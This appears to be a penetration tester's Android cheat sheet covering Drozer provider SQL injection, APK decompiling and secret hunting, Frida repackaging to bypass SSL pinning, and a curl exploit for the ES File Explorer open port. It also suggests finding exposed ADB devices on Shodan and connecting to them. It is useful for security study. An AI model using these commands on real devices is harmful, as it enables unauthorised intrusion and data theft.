Port Scan on Android
Many non-standard ports can be open on an Android device, so it is better to scan all the ports. RustScan is a fast way to do that:
https://github.com/RustScan/RustScan/releases
download the Debian package and install it
dpkg -i filename
rustscan -a 10.10.10.247
Then run nmap -sC -sV against the open ports RustScan reports, for the default scripts and version detection.
Installing ADB
sudo apt-get install android-tools-adb
Setting up Drozer
#Installing drozer on docker
docker pull withsecurelabs/drozer
#Download the drozer agent and install it on the Android device
download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0
#Drag and drop it onto the emulator or install it via adb
adb install drozer-agent.apk
#On Windows, set up port forwarding for the emulator
adb forward tcp:31415 tcp:31415
#Get a docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
#Inside the container, start drozer
drozer console connect --server host.docker.internal
# Method - II
#Find the device's IP address in Settings > About
#Connect to the Android device using that IP address
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10
#Or get a shell in the container and connect from there
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>
Drozer Commands
#List all available modules
list
#List packages
run app.package.list
#Filter for a specific app keyword
run app.package.list -f diva
#Basic info about a package
run app.package.info -a jakhar.aseem.diva
#List the attack surface: exported activities, broadcast receivers, content providers and services
run app.package.attacksurface jakhar.aseem.diva
#If the app has an exported activity
#Get activity info
run app.activity.info -a jakhar.aseem.diva
#View/access the exported activity if it shows Permission: null
run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity
run app.activity.start --component <package name> <activity class>
#You can also open the exported activity directly with adb (am start needs the package/component form)
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity
#If the app has content providers
#Get info on content providers
run app.provider.info -a jakhar.aseem.diva
#Run the scanner to find provider URIs
#Take the content URIs listed under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva
#Query a provider URI
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/
#Look for injection vulnerabilities in an app's providers
run scanner.provider.injection -a jakhar.aseem.diva
#Automatically exploit SQL injection - print tables
run scanner.provider.sqltables -a jakhar.aseem.diva
Static Analysis
#Decompile the application
apktool d application.apk
#Decompile without resources; use this when the app is very large
apktool d application.apk -r
#Search for strings in all locations
#Even the lib directory can contain useful native code or an API key
#Use strings on the .so/ELF files
#The smali directory contains the disassembled code, which is not easily readable; use a dex-to-jar converter (or jadx) to get Java source
Locations to check for Secrets
- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - search for the strings below
- firebase_database_url
- google_api_key
- google_app_id
- google_crash_reporting_api_key
- google_storage_bucket
- client_id
- API
- password
- AWS
- Secret
- http:// or https://
- .db or .sqlite or SQL
or better use jadx-gui from
https://github.com/skylot/jadx/releases/tag/v1.5.0
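As an added example (not from the original notes), the following Python script automates the search just described: it walks an apktool or jadx resources directory, parses every res/values*/*.xml file, and flags resource entries whose name is in the list above or whose value looks like a URL, a database name or a well-known key format. The directory layout, the extra key-prefix patterns (Google and AWS access keys) and the sample strings.xml are assumptions constructed for the example; only a redacted prefix of each value is printed so the output can go straight into a report.

```python
"""Flag likely secrets in decompiled Android resource XML (res/values*/*.xml).
Added example; the layout, patterns and sample data below are constructed."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Resource names from the checklist that usually hold project credentials.
SENSITIVE_NAMES = {
    "firebase_database_url", "google_api_key", "google_app_id",
    "google_crash_reporting_api_key", "google_storage_bucket", "client_id",
}
# Substrings of a resource name that deserve a second look (case-insensitive).
NAME_HINTS = ("api", "password", "aws", "secret", "key", "token")
# Patterns applied to the resource value; the last two are common key formats
# (assumption: the provider's public key prefixes, not part of the checklist).
VALUE_PATTERNS = {
    "url": re.compile(r"https?://", re.I),
    "database": re.compile(r"\.(db|sqlite)\b|\bsql\b", re.I),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}


def redact(value, keep=6):
    """Keep only a short prefix so findings can be pasted into a report."""
    return value if len(value) <= keep else value[:keep] + "..."


def scan_values_xml(xml_text, source="strings.xml"):
    """Return findings for one res/values XML document."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root:  # <string>, <integer>, <item> ... children of <resources>
        name = elem.get("name") or ""
        value = "".join(elem.itertext()).strip()
        if not value:
            continue
        reasons = []
        lname = name.lower()
        if lname in SENSITIVE_NAMES:
            reasons.append("known sensitive resource name")
        elif any(hint in lname for hint in NAME_HINTS):
            reasons.append("name hints at a credential")
        for label, pattern in VALUE_PATTERNS.items():
            if pattern.search(value):
                reasons.append(f"value looks like {label}")
        if reasons:
            findings.append({"file": source, "name": name,
                             "preview": redact(value), "reasons": reasons})
    return findings


def scan_resources(res_dir):
    """Walk res/values*/ (apktool layout) and scan every XML file in it."""
    findings = []
    for path in sorted(Path(res_dir).glob("values*/*.xml")):
        try:
            findings.extend(scan_values_xml(path.read_text(encoding="utf-8"), str(path)))
        except ET.ParseError:
            continue  # skip a malformed file instead of aborting the whole scan
    return findings


# Constructed sample resembling a leaked Firebase/Google config in strings.xml.
SAMPLE_GOOGLE_KEY = "AIza" + "SyEXAMPLE" + "0" * 26  # constructed, not a real key
SAMPLE_STRINGS_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Example App</string>
    <string name="google_api_key">{SAMPLE_GOOGLE_KEY}</string>
    <string name="firebase_database_url">https://example-app.firebaseio.com</string>
    <string name="admin_password">Sup3rSecret!</string>
    <string name="notes_db_name">notes.db</string>
    <string name="welcome">Hello</string>
</resources>
"""

if __name__ == "__main__":
    # Usage: python scan_secrets.py <decoded-apk>/res   (no argument scans the sample)
    results = (scan_resources(sys.argv[1]) if len(sys.argv) > 1
               else scan_values_xml(SAMPLE_STRINGS_XML))
    for hit in results:
        print(f'{hit["file"]}: {hit["name"]} = {hit["preview"]}  [{"; ".join(hit["reasons"])}]')
```

The name check and the value check are kept separate on purpose: a resource called admin_password with an innocuous-looking value is still worth a manual look, and a value that matches a key prefix is worth one even when the resource name says nothing.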
Keywords to look for in AndroidManifest.xml
- API keys
- Providers - content providers; find the ones which are exported
- SdkVersion (minSdkVersion / targetSdkVersion)
- Permissions
#Activities with exported="true" can be started from an adb shell with the command below; the component is written as package/.ActivityName (note the / before .ActivityName)
am start b3nac.injuredandroid/.b25lActivity
# Make sure there is no sensitive data in any activity that has exported="true"
- exported="true" - activities
- backup (android:allowBackup) - the application allows its data to be backed up; the attribute sits near the top, on the <application> element
- Debug (android:debuggable)
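As an added example (not from the original notes), this Python script reads an AndroidManifest.xml as decoded by apktool and reports the items in the checklist above: SDK versions, requested permissions, the allowBackup and debuggable flags, and every component that is effectively exported (an explicit android:exported="true", or an intent-filter on an app targeting an SDK below 31), together with whether a permission guards it. The sample manifest and the package name com.example.notes are constructed for the example; each finding carries the fix a reviewer would recommend.

```python
"""Audit a decoded AndroidManifest.xml for exported components, backup/debug
flags, SDK versions and permissions. Added example with a constructed sample."""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def attr(elem, name, default=None):
    """Read an android:-namespaced attribute from a manifest element."""
    if elem is None:
        return default
    return elem.get(f"{{{ANDROID_NS}}}{name}", default)


def is_exported(comp, min_sdk, target_sdk):
    """Effective exported state. An explicit android:exported wins. Otherwise a
    provider defaults to exported when min or target SDK is 16 or lower, and any
    other component with an <intent-filter> is implicitly exported below SDK 31
    (from 31 on, the platform refuses to install it without an explicit value)."""
    explicit = attr(comp, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if comp.tag == "provider":
        return min_sdk <= 16 or target_sdk <= 16
    return comp.find("intent-filter") is not None and target_sdk < 31


def is_launcher(comp):
    """True for the main activity; it is expected to be exported."""
    for cat in comp.iter("category"):
        if attr(cat, "name") == "android.intent.category.LAUNCHER":
            return True
    return False


def audit_manifest(xml_text):
    """Return a structured report for one manifest."""
    root = ET.fromstring(xml_text)
    sdk = root.find("uses-sdk")
    min_sdk = int(attr(sdk, "minSdkVersion", "1"))
    target_sdk = int(attr(sdk, "targetSdkVersion", str(min_sdk)))
    app = root.find("application")
    report = {
        "package": root.get("package"),
        "min_sdk": min_sdk,
        "target_sdk": target_sdk,
        "permissions": [attr(p, "name") for p in root.findall("uses-permission")],
        "debuggable": attr(app, "debuggable", "false").lower() == "true",
        # allowBackup defaults to true; only an explicit "false" turns it off.
        "allow_backup": attr(app, "allowBackup", "true").lower() == "true",
        "exported_components": [],
    }
    for comp in app:
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp, min_sdk, target_sdk):
            continue
        guards = [attr(comp, p) for p in ("permission", "readPermission", "writePermission")]
        report["exported_components"].append({
            "type": comp.tag,
            "name": attr(comp, "name"),
            "protected": any(guards),
            "launcher": is_launcher(comp),
        })
    return report


def findings(report):
    """Turn the report into review notes, each with the recommended fix."""
    notes = []
    if report["debuggable"]:
        notes.append("android:debuggable=true: a debugger can attach to the app; "
                     "remove it from release builds")
    if report["allow_backup"]:
        notes.append("android:allowBackup is enabled: app data can be exported with adb backup; "
                     "set it to false unless backups are required")
    for comp in report["exported_components"]:
        if comp["protected"] or comp["launcher"]:
            continue  # guarded by a permission, or the launcher activity (expected)
        notes.append(f'exported {comp["type"]} {comp["name"]} has no android:permission: '
                     "reachable from any app and from adb; set exported=false or guard it with a permission")
    return notes


# Constructed sample manifest in apktool's decoded form.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
    <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="28"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:allowBackup="true" android:debuggable="true" android:label="Notes">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".AdminActivity" android:exported="true"/>
        <activity android:name=".SettingsActivity"/>
        <provider android:name=".NotesProvider" android:authorities="com.example.notes.provider"
                  android:exported="true" android:readPermission="com.example.notes.READ"/>
        <service android:name=".SyncService" android:exported="false"/>
    </application>
</manifest>
"""

if __name__ == "__main__":
    # Usage: python audit_manifest.py <decoded-apk>/AndroidManifest.xml (no argument uses the sample)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    rep = audit_manifest(text)
    print(f'{rep["package"]}: minSdk={rep["min_sdk"]} targetSdk={rep["target_sdk"]} '
          f'permissions={rep["permissions"]}')
    for note in findings(rep):
        print(" -", note)
```

On the sample, .MainActivity is exported only implicitly through its intent-filter and is skipped as the launcher, .NotesProvider is exported but guarded by a readPermission, and .AdminActivity is the one component a reviewer should raise, alongside the debuggable and allowBackup flags.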
AWS Enumeration
use the Cloud Enum tool, available on GitHub
Firebase DB Enum
- See if you can find a Firebase URL in the source code; if so, open it and see what is exposed there
- dirb it and find any exposed content
- Find the DB referenced in the apk
Use https://github.com/Sambal0x/firebaseEnum
git clone https://github.com/Sambal0x/firebaseEnum.git
cd firebaseEnum
python -m pip install -r requirements.txt
python3 firebaseEnum.py -k APK_Name
Abusing ES File Explorer Vuln
The exploit can be downloaded from here
or use curl to abuse it:
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777
Installing and Setting up Frida & Objection
python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection
add this path to the PATH environment variable (update as required): "C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0"
#Patch the apk with objection first; if that doesn't work, patch it manually with Frida (next section)
objection patchapk --source injuredAndroid.apk
#A new apk is generated in the same directory, named name.objection.apk
#Drag and drop the new apk into the Android emulator; uninstall the original apk and install the patched one.
Patching Manually using Frida
You can follow this tutorial
#Decompile without resources; use this when the app is very large
apktool d application.apk -r
#Go to the lib directory of the decompiled apk and into the architecture that matches the emulator
APK_NAME/lib/x86_64/
go to the Frida releases page, download the matching gadget and extract it, e.g.
frida-gadget-16.3.3-android-x86_64.so.xz
#Rename the file to libfrida-gadget.so or frida-gadget.so (based on the naming convention of the existing libraries; note that System.loadLibrary("frida-gadget") resolves to libfrida-gadget.so) and copy it into APK_NAME/lib/x86_64/
#Paste the code below into a smali file you know is loaded for sure - Example: MainActivity.smali under /APK_NAME/smali/Company/APK_NAME/ (Ex: injuredAndroid/smali/b3nac/injuredandroid/). It must go inside a method body, e.g. at the start of onCreate() right after its .locals line (the method needs at least one local register for v0). Save the file.
const-string v0, "frida-gadget"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
#Add the INTERNET permission to the manifest if it's not there already, so that the Frida gadget can open a socket.
<uses-permission android:name="android.permission.INTERNET" />
#Rebuild the apk
apktool b injuredAndroid -o inured_patched.apk
apktool b DirectoryPath -o Output.apk
#Sign the APK
keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname
jarsigner -verify inured_patched.apk
# Installing zipalign
nano /etc/apt/sources.list
#Comment out the Kali apt source and add the line below
deb http://ftp.de.debian.org/debian buster main
sudo apt update
sudo apt install zipalign
zipalign 4 inured_patched.apk inured_final.apk
#Drag and drop the final apk into the emulator and start the app
#Start objection and attach to the running app
objection explore
#Disable SSL pinning
android sslpinning disable
Dynamic Analysis with MobSF
#For Linux
download MobSF, run setup.sh and then run.sh
#For Windows
Download Docker from https://docs.docker.com/desktop/install/windows-install/
#Set up MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest
#Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
#Or add a new environment variable
Variable name: mobsf
Variable value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
From now on, type the following in cmd to run MobSF on Docker
%mobsf%
#Log in to the application with the credentials mobsf/mobsf
http://127.0.0.1:8000/login/
#Add the path below to the PATH environment variable
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator
ADB Commands
ADB Cheatsheet is here
#Forward the ADB TCP port from a remote host to the local machine over SSH
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local
#Make the device listen for ADB over TCP/IP (restarts adbd on the given port)
adb tcpip 9090
#Connect to the TCP/IP adbd service
adb connect 127.0.0.1:5555
#List connected devices
adb devices
#Get a shell on a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell
#Get a shell
adb shell
#Get root privileges inside the shell (rooted device or emulator)
su
#Install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"
#Take a screenshot
adb shell screencap <path to save>
#Record the screen
adb shell screenrecord <path to save>
#Download files
adb pull <source file path> <destination file path>
#Upload files
adb push <source file path> <destination file path>
#Open a website in the browser
adb shell am start -a android.intent.action.VIEW -d <URL of the website>
#Get system properties
adb shell getprop
Commands inside ADB Shell
#List Available packages
pm list packages
# Find a specific package
pm list packages | grep Name
# Find the path of the package
pm path full_packageName
pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk
# Download the apk back to the host machine
#Exit the adb shell first
exit
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
#In case you have multiple emulators open
adb -s emulator-5556 pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
# You can now open the apk for static analysis
Finding Devices on Shodan
#Shodan search term: android debug bridge
adb connect 100.100.100.100:5555
Get remote screen access to a device (scrcpy)
apt install scrcpy
scrcpy